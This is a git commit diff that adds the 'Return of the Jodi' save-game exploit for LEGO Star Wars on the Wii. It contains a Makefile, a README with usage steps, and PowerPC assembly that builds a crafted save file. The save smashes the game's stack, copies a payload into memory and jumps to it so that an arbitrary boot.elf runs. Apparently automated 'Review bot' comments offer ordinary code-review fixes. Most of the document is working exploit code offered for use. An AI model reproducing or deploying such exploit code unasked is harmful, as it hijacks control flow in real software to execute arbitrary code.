LEGO Star Wars by roto
authorBernhard Urban <lewurm@gmail.com>
Wed, 2 Feb 2011 02:14:14 +0000 (03:14 +0100)
committerSegher Boessenkool <segher@kernel.crashing.org>
Wed, 2 Feb 2011 19:59:54 +0000 (20:59 +0100)
23 files changed:
Makefile
lsw/.gitignore [new file with mode: 0644]
lsw/Makefile [new file with mode: 0644]
lsw/README [new file with mode: 0644]
lsw/exploit.s [new file with mode: 0644]
lsw/exploit2.s [new file with mode: 0644]
lsw/generic-banner.png [new file with mode: 0644]
lsw/generic-banner.ppm [new file with mode: 0644]
lsw/head.b [new file with mode: 0755]
lsw/head.s [new file with mode: 0644]
lsw/lego.lds [new file with mode: 0644]
lsw/make-title-bin.pl [new file with mode: 0755]
lsw/pack.sh [new file with mode: 0755]
lsw/rlge-icon.png [new file with mode: 0644]
lsw/rlge-icon.ppm [new file with mode: 0644]
lsw/rlgj-icon.png [new file with mode: 0644]
lsw/rlgj-icon.ppm [new file with mode: 0644]
lsw/rlgp-icon.png [new file with mode: 0644]
lsw/rlgp-icon.ppm [new file with mode: 0644]
lsw/titleid.pl [new file with mode: 0755]
lsw/toc-rlge [new file with mode: 0644]
lsw/toc-rlgj [new file with mode: 0644]
lsw/toc-rlgp [new file with mode: 0644]

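--- a/Makefile
+++ b/Makefile
@@ -53,6 +53,7 @@ all: FORCE .version
 	$(Q)$(MAKE) -C twilight
 	$(Q)$(MAKE) -C lego
 	$(Q)$(MAKE) -C batman
+	$(Q)$(MAKE) -C lsw
 
 FORCE:
 
@@ -62,3 +63,4 @@ clean:
 	$(MAKE) -C twilight clean
 	$(MAKE) -C lego clean
 	$(MAKE) -C batman clean
+	$(MAKE) -C lsw clean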
diff --git a/lsw/.gitignore b/lsw/.gitignore
new file mode 100644 (file)
index 0000000..7b626cd
--- /dev/null
@@ -0,0 +1,5 @@
+rlg?.bin
+FILE_V28
+exploit.bin
+exploit.elf
+title.bin
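Review bot: The ignore list is narrower than what lsw/Makefile actually produces: its `clean` target removes `exploit.o`, `head.bin`, `head.elf` and `head.o`, none of which are listed here, so every build leaves those four showing up as untracked. Adding `*.o`, `head.bin` and `head.elf` alongside the existing entries keeps `git status` quiet after `make`.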
diff --git a/lsw/Makefile b/lsw/Makefile
new file mode 100644 (file)
index 0000000..60e345f
--- /dev/null
@@ -0,0 +1,127 @@
+# Copyright 2008-2009  Segher Boessenkool  <segher@kernel.crashing.org>
+# Copyright      2011  roto <roto@mozy.org>
+# Copyright      2011  Bernhard Urban <lewurm@gmail.com>
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+
+# Configuration:
+
+# What toolchain prefix should we use
+CROSS ?= broadway-
+
+# Where are the tools (http://git.infradead.org/users/segher/wii.git)
+TOOLS ?= $(HOME)/wii/segher
+
+# End of configuration.
+
+
+
+# Set CC, LD, OBJCOPY based on CROSS, unless they are set already
+
+ifeq ($(origin CC), default)
+       CC := $(CROSS)gcc -m32
+endif
+ifeq ($(origin LD), default)
+       LD := $(CROSS)ld
+endif
+OBJCOPY ?= $(CROSS)objcopy
+
+
+# The compiler flags we need.
+
+CFLAGS := -Wall -W -Os -ffreestanding -mno-eabi -mno-sdata -mcpu=750
+
+
+# Build with "V=1" to see the commands executed; be quiet otherwise.
+
+ifeq ($(V),1)
+       Q :=
+else
+       Q := @
+       MAKEFLAGS += --no-print-directory
+endif
+
+
+targets := rlge.bin rlgp.bin rlgj.bin
+
+ppms := $(targets:%.bin=%-icon.ppm) generic-banner.ppm
+assets := title.bin $(ppms)
+
+loader := ../loader/loader.bin
+
+
+titleid = $(shell perl titleid.pl $(1))
+
+
+define twintig
+       D=$(call titleid,$(1));                         \
+       $(TOOLS)/twintig $$D $@ toc-$1
+endef
+
+
+all: $(targets)
+
+$(targets): %.bin: toc-% FILE_V28 $(assets)
+       @echo "  TWINTIG   $@"
+       $(Q)$(call twintig,$*)
+
+FILE_V28: head.bin exploit.bin $(loader)
+       @echo "  LEGOSTACK $@"
+       $(Q)./pack.sh $@ $^
+       $(Q)$(TOOLS)/lego-cksum $@ 32380 #32328 #32688
+
+head.bin: head.elf
+       @echo "  OBJCOPY   $@"
+       $(Q)$(OBJCOPY) -Obinary $< $@
+
+exploit.bin: exploit.elf
+       @echo "  OBJCOPY   $@"
+       $(Q)$(OBJCOPY) -Obinary $< $@
+
+exploit.elf: lego.lds exploit.o
+       @echo "  LINK      $@"
+       $(Q)$(LD) -T $^ -o $@
+
+head.elf: head.o
+       @echo "  LINK      $@"
+       $(Q)$(LD) -e 0 $< -o $@
+
+exploit.o: exploit.s
+       @echo "  ASSEMBLE  $@"
+       $(Q)$(CC) $(CFLAGS) -c $< -o $@
+
+head.o: head.s head.b exploit2.s exploit.bin
+       @echo "  ASSEMBLE  $@"
+       $(Q)$(CC) $(CFLAGS) \
+               -Wa,--defsym,exploitlen=$(shell wc -c exploit.bin | awk '{ print $$1 }') \
+               -c $< -o $@
+
+title.bin: ../.version
+       @echo "  TITLEBIN  $@"
+       $(Q)perl make-title-bin.pl > $@
+
+../.version: FORCE
+       $(Q)$(MAKE) -C .. .version
+
+$(ppms): %.ppm: %.png
+       @echo "  PPM       $@"
+       $(Q)convert $< $@
+
+zero16k:
+       $(Q)dd if=/dev/zero bs=18256 count=1 2>/dev/null > $@
+#17332
+#16384
+FAILURE:
+       $(Q)echo FAILURE > $@
+
+$(loader): FORCE
+       $(Q)$(MAKE) -C ../loader
+
+FORCE:
+
+clean:
+       -rm -f $(targets) FILE_V28
+       -rm -f exploit.bin exploit.elf exploit.o
+       -rm -f head.bin head.elf head.o
+       -rm -f title.bin
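Review bot: `FILE_V28` is built in two steps — `./pack.sh $@ $^` writes the file and `$(TOOLS)/lego-cksum` then patches it in place — and nothing removes the target when the second step fails, so a half-processed FILE_V28 is left with a fresh mtime and the next `make` treats it as up to date; adding `.DELETE_ON_ERROR:` near the top of the file fixes this for every rule at once. The `zero16k` and `FAILURE` targets are referenced by no other rule, and the commented-out numbers (`#32328 #32688` on the lego-cksum line, `#17332`, `#16384` below zero16k) read as leftover experiments — either a comment saying what they are or removal. In `clean`, the `-` prefix is redundant with `rm -f`; the usual form is `$(RM) $(targets) FILE_V28`, and the same applies to the three lines below it.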
diff --git a/lsw/README b/lsw/README
new file mode 100644 (file)
index 0000000..060c267
--- /dev/null
@@ -0,0 +1,41 @@
+Copyright 2011  roto <roto@mozy.org>
+Copyright 2011  Bernhard Urban <lewurm@gmail.com>
+Copyright 2008-2009  Segher Boessenkool  <segher@kernel.crashing.org>
+Copyright 2008  Haxx Enterprises  <bushing@gmail.com>
+Copyright 2008  Hector Martin "marcan"  <marcan@marcansoft.com>
+Copyright 2003-2004  Felix Domke <tmbinc@elitedvb.net>
+
+This code is licensed to you under the terms of the GNU GPL, version 2;
+see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+Console font created by Freddy Leitner [www.dreamer.de], based on
+the Droid Sans Mono font [www.droidfonts.com].
+
+--
+
+This is the Lego Star Wars exploit known as "Return of the Jodi". This exploit
+works on all versions of the game (including 1.01) in all regions that are
+currently known to have a release.
+
+Instructions:
+
+1. Copy the save to your SD card.
+2. Put a "boot.elf" (such as the HackMii installer or Homebrew Channel) into the
+   ROOT of your SD card (not into any folder).
+3. Copy the save to your Wii system, make sure you have a save for this game
+   already on your system, otherwise you won't be able to copy the exploit
+   save over.
+4. Start up the game, load the first save slot (on the left, at 0.0%)
+5. As soon as the level loads, run to the right and you'll see two characters
+   floating. Run to the area in front of them and you'll see "Return of Jodi"
+   show up, press the "A" button on your Wiimote and your boot.elf will run!
+
+
+Credits: 
+Team Twiizers - Original LIJ release, source, savezelda (and many other things).
+roto - Developing and testing this exploit.
+lewurm - Cleaning up, fixing bugs, testing.
+drmr - Awesome banner/icons!
+
+Thanks:
+Everyone!
diff --git a/lsw/exploit.s b/lsw/exploit.s
new file mode 100644 (file)
index 0000000..f5b6bbd
--- /dev/null
@@ -0,0 +1,38 @@
+# Copyright 2008-2009  Segher Boessenkool  <segher@kernel.crashing.org>
+# Copyright      2011  roto <roto@mozy.org>
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+       .section .start,"ax"
+
+start:
+       # Set up a stack frame.
+       lis 1,0x8080 ; li 0,0 ; stwu 0,-64(1)
+
+       # Stop audio and video.
+       lis 0,audio_stop@h ; ori 0,0,audio_stop@l ; mtctr 0 ; bctrl
+       lis 0,video_stop@h ; ori 0,0,video_stop@l ; mtctr 0 ; bctrl
+
+       # Move code into place; a generous 32kB, starting at 64kB in
+       # the save file.
+
+       # Load address where we're going to move our exploit code to
+       # (0x90000020) into R03
+       lis 3,main@h ; ori 3,3,main@l ; addi 5,3,-4
+
+       # Load the address for the beginning of our save data
+       # (0x91168ea0) into R04
+       lis 4,save@h ; ori 4,4,save@l ; addi 4,4,-4
+
+       addis 4,4,1 ; addi 4,4,end-start
+       li 0,0x2000 ; mtctr 0
+0:     lwzu 0,4(4) ; stwu 0,4(5) ; bdnz 0b
+
+       # Sync caches on it.
+       li 0,0x0400 ; mtctr 0 ; mr 5,3
+0:     dcbst 0,5 ; sync ; icbi 0,5 ; addi 5,5,0x20 ; bdnz 0b
+       sync ; isync
+
+       # Jump to 0x90000020 and go for it!
+       mtctr 3 ; bctr
+end:
diff --git a/lsw/exploit2.s b/lsw/exploit2.s
new file mode 100644 (file)
index 0000000..a845958
--- /dev/null
@@ -0,0 +1,57 @@
+# Copyright 2008-2009  Segher Boessenkool  <segher@kernel.crashing.org>
+# Copyright      2011  roto <roto@mozy.org>
+# Copyright      2011  Bernhard Urban <lewurm@gmail.com>
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+       bptr = 0x91178ea0
+       save = 0x91177f40
+       main = 0x90000020
+
+       audio_stop_usa = 0x8038ce9c
+       video_stop_usa = 0x8039971c
+
+       audio_stop_eur = 0x8038cfec
+       video_stop_eur = 0x80399708
+
+       audio_stop_data = 0x9421fff0 # stwu 1,-16(1)
+       video_stop_data = 0x9421ffe0 # stwu 1,-32(1)
+
+       # Set up a stack frame.
+       lis 1,0x8080 ; li 0,0 ; stwu 0,-64(1)
+
+       # Stop audio.
+       lis 10,audio_stop_data@h ; ori 10,10,audio_stop_data@l
+       lis 3,audio_stop_usa@h ; ori 3,3,audio_stop_usa@l; lwz 5,0(3)
+       cmpw 5,10 ; beq execa
+       lis 3,audio_stop_eur@h ; ori 3,3,audio_stop_eur@l
+execa:
+       mtctr 3 ; bctrl
+
+       # Stop video.
+       lis 10,video_stop_data@h ; ori 10,10,video_stop_data@l
+       lis 3,video_stop_usa@h ; ori 3,3,video_stop_usa@l; lwz 5,0(3)
+       cmpw 5,10 ; beq execv
+       lis 3,video_stop_eur@h ; ori 3,3,video_stop_eur@l
+execv:
+       mtctr 3 ; bctrl
+
+       # Move code into place; a generous 32kB, starting at 64kB in
+       # the save file.
+       lis 3,main@h ; ori 3,3,main@l ; addi 5,3,-4
+       lis 4,save@h ; ori 4,4,save@l ; addi 4,4,-4
+
+       addis 4,4,1 ; addi 4,4,exploitlen # offset for exploit.bin
+
+       li 0,0x2000 ; mtctr 0
+loop1:
+       lwzu 0,4(4) ; stwu 0,4(5) ; bdnz loop1
+
+       # Sync caches on it.
+       li 0,0x0400 ; mtctr 0 ; mr 5,3
+loop2:
+       dcbst 0,5 ; sync ; icbi 0,5 ; addi 5,5,0x20 ; bdnz loop2
+       sync ; isync
+
+       # Go for it!
+       mtctr 3 ; bctr
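Review bot: The addresses at the top of this file (`bptr`, `save`, `main`) duplicate symbols that lego.lds defines for exploit.s (`main` and `bptr` with identical values, `save` with a different one), and head.s defines `bptr` a third time, so a future edit to one copy can silently leave the others stale; a comment on each definition naming the file that is authoritative, or one shared definitions file that all three include, would make the relationship explicit. `bptr` is defined here but not used in this file — it is read from head.s, which `.include`s this file — and a comment such as `# bptr is used by head.s, which includes this file` would save the next reader the search. The `# stwu 1,-16(1)` / `# stwu 1,-32(1)` comments on the `*_data` words are good; the block they guard (the `cmpw`/`beq execa` and `beq execv` pairs) deserves a one-line comment stating that the word at the USA address is compared against the expected instruction encoding to choose between the USA and EUR address tables.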
diff --git a/lsw/generic-banner.png b/lsw/generic-banner.png
new file mode 100644 (file)
index 0000000..870b6bb
Binary files /dev/null and b/lsw/generic-banner.png differ
diff --git a/lsw/generic-banner.ppm b/lsw/generic-banner.ppm
new file mode 100644 (file)
index 0000000..bfe9257
Binary files /dev/null and b/lsw/generic-banner.ppm differ
diff --git a/lsw/head.b b/lsw/head.b
new file mode 100755 (executable)
index 0000000..cae261d
Binary files /dev/null and b/lsw/head.b differ
diff --git a/lsw/head.s b/lsw/head.s
new file mode 100644 (file)
index 0000000..6670b80
--- /dev/null
@@ -0,0 +1,43 @@
+# Copyright      2011  roto <roto@mozy.org>
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+       bptr = 0x91178ea0
+
+0:
+       # Part of the savefile
+       .long 0x00000001, 0x00000000, 0x00000000, 0x00000000
+       .long 0x00000000, 0x00000013, 0x0000000d, 0x00000000
+       .long 0x00000002, 0x00000000, 0x000007db, 0x00000000
+       .long 0x00000001, 0x0000029e, 0x0000019d, 0x00050000
+       .long 0x01010008, 0x060a0100, 0x00000001, 0x00000000
+       .long 0x00000000, 0x00000000, 0x00000000, 0x00000000
+
+       # Filler
+        .fill 0xF60 - (. - 0b)
+
+exploitv2:
+       # This is necessary for the 2nd exploit  (first release) of LSW
+       .include "exploit2.s"
+
+       # More filler
+       .fill 0x7860 - (. - 0b) 
+
+       # Insert rest of the save
+       .incbin "head.b"
+
+       # Smack the stack.
+       .long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+       .long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+       .long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+       .long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+       .long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+       .long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+       .long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+       .long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+       .long 0x11111111
+
+       # Depending on the version we jump now to exploit.s or to "exploit2v:"
+       .long 0x11111111,       bptr, 0x11111111, 0x11111111
+
+       .fill 0x10000 - (. - 0b)
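Review bot: The comment on the final data word refers to a label `"exploit2v:"` that does not exist; the label defined earlier in this file is `exploitv2:`, so the line should read `# Depending on the version we jump now to exploit.s or to "exploitv2:"`. Two layout nits in the same hunk: the first `.fill 0xF60 - (. - 0b)` line is indented with an extra space before the tab, unlike every other line, and `.fill 0x7860 - (. - 0b)` carries trailing whitespace. The 33 repeated `.long 0x11111111` words would be more reviewable as a single `.fill 33, 4, 0x11111111`, which makes the count explicit instead of something the reader has to tally.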
diff --git a/lsw/lego.lds b/lsw/lego.lds
new file mode 100644 (file)
index 0000000..1718044
--- /dev/null
@@ -0,0 +1,26 @@
+/* Copyright 2008-2009  Segher Boessenkool  <segher@kernel.crashing.org>
+   This code is licensed to you under the terms of the GNU GPL, version 2;
+   see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt  */
+
+OUTPUT_FORMAT("elf32-powerpc")
+OUTPUT_ARCH(powerpc:common)
+
+SECTIONS {
+       audio_stop = 0x8038ce90;
+       video_stop = 0x80399708;
+
+       save = 0x91168ea0;
+       bptr = 0x91178ea0;
+       
+       main = 0x90000020;
+
+       .twilight save :
+       {
+               rli*.o(.start)
+               *(.text)
+               *(.rodata .rodata.*)
+               *(.data)
+               *(.bss)
+               /* . = 0x0a94; */
+       }
+}
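Review bot: The input-section pattern `rli*.o(.start)` cannot match the only object this script links, `exploit.o` (`exploit.elf: lego.lds exploit.o` in lsw/Makefile), so `.start` matches nothing in the script and where it lands is decided by the linker's orphan-section handling rather than by the `save` address given here; `exploit.o(.start)` or `*(.start)` makes the placement explicit. The output section name `.twilight` and the commented-out `/* . = 0x0a94; */` look inherited from another loader's script — the dead comment should go. The line between `bptr` and `main` is whitespace-only, and a one-line comment above `SECTIONS` noting that these addresses must agree with the definitions in exploit2.s and head.s would help whoever touches them next.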
diff --git a/lsw/make-title-bin.pl b/lsw/make-title-bin.pl
new file mode 100755 (executable)
index 0000000..4bcc5d7
--- /dev/null
@@ -0,0 +1,16 @@
+#!/usr/bin/perl
+sub printline {
+       my $x = shift;
+       chomp $x;
+       $x .= "\0" x 32;
+       $x = substr $x, 0, 32;
+       $x =~ s/(.)/\0$1/g;
+
+       print $x;
+}
+
+$name = "Return of the Jodi";
+$version = `cat ../.version`;
+
+printline $name;
+printline $version;
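Review bot: The backtick `cat ../.version` call shells out and silently yields an empty string if the file is missing or unreadable, which `printline` then turns into 32 NUL pairs with no error; reading the file directly and failing loudly is shorter: `open my $fh, '<', '../.version' or die "../.version: $!"; my $version = <$fh>; close $fh;`. The script has no `use strict; use warnings;`, and `$name` and `$version` are globals. `printline` deserves a header comment stating its contract as the code shows it: the input is chomped, truncated or NUL-padded to 32 characters, and each character is emitted with a NUL byte in front of it, so every call writes exactly 64 bytes.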
diff --git a/lsw/pack.sh b/lsw/pack.sh
new file mode 100755 (executable)
index 0000000..57a388b
--- /dev/null
@@ -0,0 +1,3 @@
+#!/bin/bash
+TARGET=$1; shift
+cat $* /dev/zero | dd bs=1024 count=128 2>/dev/null > $TARGET
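Review bot: `dd bs=1024 count=128` counts input reads rather than bytes, and reads from a pipe may be short, so `$TARGET` can come out smaller than the 128 KiB the script intends; `head -c 131072` (or GNU dd's `iflag=fullblock`) gives a fixed size: `cat "$@" /dev/zero | head -c 131072 > "$TARGET"`. `$*` and `$TARGET` are unquoted, which breaks on paths containing spaces, and there is no `set -e`, so a missing input file only produces a warning from `cat` while the zero padding still fills the output to full size. A one-line header comment — concatenate the inputs and zero-pad to 128 KiB — would help the Makefile reader.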
diff --git a/lsw/rlge-icon.png b/lsw/rlge-icon.png
new file mode 100644 (file)
index 0000000..222c293
Binary files /dev/null and b/lsw/rlge-icon.png differ
diff --git a/lsw/rlge-icon.ppm b/lsw/rlge-icon.ppm
new file mode 100644 (file)
index 0000000..0b55e59
Binary files /dev/null and b/lsw/rlge-icon.ppm differ
diff --git a/lsw/rlgj-icon.png b/lsw/rlgj-icon.png
new file mode 100644 (file)
index 0000000..cc0edc0
Binary files /dev/null and b/lsw/rlgj-icon.png differ
diff --git a/lsw/rlgj-icon.ppm b/lsw/rlgj-icon.ppm
new file mode 100644 (file)
index 0000000..6388419
Binary files /dev/null and b/lsw/rlgj-icon.ppm differ
diff --git a/lsw/rlgp-icon.png b/lsw/rlgp-icon.png
new file mode 100644 (file)
index 0000000..706e616
Binary files /dev/null and b/lsw/rlgp-icon.png differ
diff --git a/lsw/rlgp-icon.ppm b/lsw/rlgp-icon.ppm
new file mode 100644 (file)
index 0000000..4fb2024
Binary files /dev/null and b/lsw/rlgp-icon.ppm differ
diff --git a/lsw/titleid.pl b/lsw/titleid.pl
new file mode 100755 (executable)
index 0000000..f735f1d
--- /dev/null
@@ -0,0 +1,2 @@
+#!/usr/bin/perl
+print "00010000", map { sprintf "%02x", ord uc } split //, $ARGV[0];
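Review bot: With no argument `$ARGV[0]` is undef and the script prints just `00010000`, which the `twintig` template in lsw/Makefile would then pass on as a truncated id; a guard such as `die "usage: titleid.pl <id>\n" unless defined $ARGV[0];` fails at the right place instead. The output deliberately has no trailing newline, which is what the Makefile's `$(shell perl titleid.pl $(1))` capture wants — a comment saying so would stop someone "fixing" it. Like make-title-bin.pl, the script would benefit from `use strict; use warnings;`.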
diff --git a/lsw/toc-rlge b/lsw/toc-rlge
new file mode 100644 (file)
index 0000000..3d42533
--- /dev/null
@@ -0,0 +1,4 @@
+title.bin
+generic-banner.ppm
+rlge-icon.ppm
+FILE_V28 FILE_V28
diff --git a/lsw/toc-rlgj b/lsw/toc-rlgj
new file mode 100644 (file)
index 0000000..7f52ef8
--- /dev/null
@@ -0,0 +1,4 @@
+title.bin
+generic-banner.ppm
+rlgj-icon.ppm
+FILE_V28 FILE_V28
diff --git a/lsw/toc-rlgp b/lsw/toc-rlgp
new file mode 100644 (file)
index 0000000..bf2a58e
--- /dev/null
@@ -0,0 +1,4 @@
+title.bin
+generic-banner.ppm
+rlgp-icon.ppm
+FILE_V28 FILE_V28